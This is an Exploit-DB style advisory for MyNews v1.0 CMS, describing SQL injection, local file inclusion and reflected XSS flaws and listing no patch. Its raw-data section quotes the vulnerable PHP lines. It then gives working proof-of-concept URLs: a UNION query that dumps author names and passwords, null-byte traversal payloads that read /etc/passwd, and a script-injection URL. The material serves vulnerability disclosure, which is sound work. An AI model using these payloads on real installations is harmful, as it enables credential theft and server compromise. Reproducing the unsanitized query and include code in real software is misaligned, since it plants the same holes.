MyNews v1.0 CMS - Sql Injection, local file inclusion and XSS Vulnerabilities

vendor:

MyNews

by:

mr_me

7,5

CVSS

HIGH

Sql Injection, local file inclusion and XSS

89, 94, 79

CWE

Product Name: MyNews

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:magtrb:mynews:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

MyNews v1.0 CMS – Sql Injection, local file inclusion and XSS Vulnerabilities

MyNews v1.0 CMS is vulnerable to Sql Injection, local file inclusion and XSS. The Sql Injection vulnerability is present in the 'article.php' file, where user-supplied input is not properly sanitized before being used in an SQL query. The local file inclusion vulnerability is present in the 'index.php' and 'admin.php' files, where user-supplied input is not properly sanitized before being used in an include statement. The XSS vulnerability is present in the 'admin.php' file, where user-supplied input is not properly sanitized before being used in an echo statement.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL queries, include files, or echo statements.

Source

Exploit-DB raw data:

MyNews v1.0 CMS - Sql Injection, local file inclusion and XSS Vulnerabilities
Found by: mr_me - http://net-ninja.net/
Advisory: http://www.corelan.be:8800/advisories.php?id=10-040
Dork: "Corelan Security Team"
Homepage: http://mynews.magtrb.com/
Download: http://mynews.magtrb.com/download.php?fname=upload/Versions/MyNews+v1.0.zip
Greetz: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Notes: 
- Provided 'as is', without any warranty.
- Use for educational purposes only.
- Do not use this to do anything illegal !
- Corelan cannot be held responsible for any damages this may cause.

******************
Sql Injection PoC:
******************

-------[ SNIP ]----------> article.php, line 10
$sql_query = "select id, title, text, views from ".$prefix."_news where id=".$_GET[id]."";
-------[ EOF SNIP ]------>

http://[server]/MyNews/index.php?act=article&id=[ SQLI ]
http://[server]/MyNews/index.php?act=article&id=-12+union+select+1,2,concat(name,0x3a,pwd),4+from+_authors--

********************
File Inclusion PoCs:
********************

-------[ SNIP ]----------> index.php, line 18
if (!isset($_GET['act'])) { $act = 'news'; } else { $act = $_GET['act']; }

include('./includes/header.php');
require('./includes/'.$act.'.php');
-------[ EOF SNIP ]------>

-------[ SNIP ]----------> admin.php, line 65
if(!isset($act)){$act ="index"; }

if($act){include("includes/admin/$act.php");
$smarty->assign("act", $act);
}
-------[ EOF SNIP ]------>

1:
http://[server]/MyNews/index.php?act=[ LFI ]%00&id=12
http://[server]/MyNews/index.php?act=../../../../etc/passwd%00&id=12

2 (requires authentication):
http://[server]/MyNews/admin.php?act=[ LFI ]%00
http://[server]/MyNews/admin.php?act=../../../../etc/passwd%00

*******************
Reflective XSS PoC:
*******************

http://[server]/MyNews/admin.php?act=<script>alert("Found by the Corelan Security Team")</script>